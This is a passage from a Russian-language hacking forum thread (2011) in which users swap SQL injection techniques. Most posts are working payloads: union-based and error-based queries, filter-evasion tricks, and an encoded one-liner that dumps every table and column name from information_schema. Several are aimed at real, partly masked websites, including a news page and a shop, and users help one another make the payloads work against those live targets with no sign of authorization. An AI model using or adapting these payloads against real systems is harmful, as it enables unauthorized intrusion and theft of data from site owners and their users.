Старый 18.09.2011, 15:08   #1311
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

Flakt, cheatsheet в помощь, это все довольно тривиально: http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
Raz0r вне форума   Ответить с цитированием
Старый 23.09.2011, 03:29   #1312
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

с точки зрения пхп наверное нет, но если есть привилегии execute:
Код:
mysql> do @a:=concat('selec','t user()');prepare stmt from @a;execute stmt;
Query OK, 0 rows affected (0.00 sec)

Query OK, 0 rows affected (0.00 sec)
Statement prepared

+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
UPD
Цитата:
Сообщение от Tigger Посмотреть сообщение
SEL/**/ECT
Ну, к примеру, вот так.
а как оно выполнится, по твоему, должно?
__________________
Sad panda

Последний раз редактировалось nobody; 23.09.2011 в 04:23..
nobody вне форума   Ответить с цитированием
Старый 23.09.2011, 13:43   #1313
Redwood
 
Аватар для Redwood
 
Регистрация: 06.07.2010
Сообщений: 5
Репутация: 1
По умолчанию

Цитата:
Сообщение от Tigger Посмотреть сообщение
SEL/**/ECT
Ну, к примеру, вот так.
Ты не перепутал такой обход с обходом мод секьюрити, где запрос чистится от комментариев, нуллбайта и прочего мусора?
Так этот фильтр не обойти, ты рвешь оператор, нарушая синтаксис запроса.
Redwood вне форума   Ответить с цитированием
Старый 23.09.2011, 16:11   #1314
trashmail
 
Регистрация: 08.09.2011
Сообщений: 37
Репутация: -2
По умолчанию

Впервые столкнулся с ситуацией когда есть инъекция в 5 версии мускула
http://vuln/union+select+1,2,3,4,5+from+information_schema.tab les+--+

с доступной базой information_schema, и как показал count(*) - не пустой таблицей tables.
НО! Когда пытаюсь получить содержимое этой таблице - выплёвывает ошибку как будто нет такой колонки

http://vuln/union+select+1,table_name,3,4,5+from+information_s chema.tables+--+
trashmail вне форума   Ответить с цитированием
Старый 23.09.2011, 16:14   #1315
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от trashmail Посмотреть сообщение
Впервые столкнулся с ситуацией когда есть инъекция в 5 версии мускула
http://www.***.org/vernoticia.php?codigo=10471+and+1=0+union+select+1 ,2,3,4,5+from+information_schema.tables+--+

с доступной базой information_schema, и как показал count(*) - не пустой таблицей tables.
НО! Когда пытаюсь получить содержимое этой таблице - выплёвывает ошибку как будто нет такой колонки

http://www.***.org/vernoticia.php?codigo=10471+and+1=0+union+select+1 ,table_name,3,4,5+from+information_schema.tables+--+
Так не пробовал?
http://www.***.org/vernoticia.php?codigo=10471+and+1=0+union+select+1 ,2,3,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73el ect(null)%66rom(%69nformation_schema.%63olumns)%77 here(%74able_schema!=0x696e666f726d6174696f6e5f736 368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c6272 3e,table_schema,0x2e,table_name,0x3a,%63olumn_name ))))x),5+from+information_schema.tables+--+

Последний раз редактировалось Twost; 17.05.2013 в 12:27..
Flakt вне форума   Ответить с цитированием
Старый 23.09.2011, 16:26   #1316
trashmail
 
Регистрация: 08.09.2011
Сообщений: 37
Репутация: -2
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Так не пробовал?
Круто, спасибо. Хотел бы узнать почему не выводилось обычным способом.
trashmail вне форума   Ответить с цитированием
Старый 23.09.2011, 17:43   #1317
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Цитата:
Сообщение от Tigger Посмотреть сообщение
Да, ты прав. Я в курсе этого, но сначала все-таки решил проверить в phpMyAdmin с использованием такого запроса и оно, на удивление, отработало. Не заметил что phpMyAdmin, тоже очищает запросы от мусора. Лучше бы проверил через консоль =)
Эмм? Какой phpmyadmin такое пропускает?
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 23.09.2011, 17:58   #1318
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от Jokester Посмотреть сообщение
Эмм? Какой phpmyadmin такое пропускает?
pma v 3.1.3 отработал нормально
pma v 3.4.1 - error in your SQL syntax
nikp вне форума   Ответить с цитированием
Старый 23.09.2011, 22:14   #1319
winner13
 
Регистрация: 16.09.2011
Сообщений: 4
Репутация: 0
По умолчанию

http://www.***.com/shop/voucher_list.asp?Id=4+group+by+concat(concat_ws(0x 3a3a,version(),user(),database()),floor(rand(0)*2) )+having+min(0)+or+1+--+

Почти всё перепробывал, в стандарт выводе через unionполучается вот такое

All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

Помогите пожалуйтса.

Последний раз редактировалось Twost; 17.05.2013 в 12:27..
winner13 вне форума   Ответить с цитированием
Старый 23.09.2011, 22:20   #1320
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

Цитата:
Сообщение от winner13 Посмотреть сообщение
http://www.***.com/shop/voucher_list.asp?Id=4+group+by+concat(concat_ws(0x 3a3a,version(),user(),database()),floor(rand(0)*2) )+having+min(0)+or+1+--+

Почти всё перепробывал, в стандарт выводе через unionполучается вот такое

All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

Помогите пожалуйтса.
http://www.***.com/shop/voucher_list.asp?Id=1+or+1=@@version--

это mssql

Последний раз редактировалось Twost; 17.05.2013 в 12:27..
vp$ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot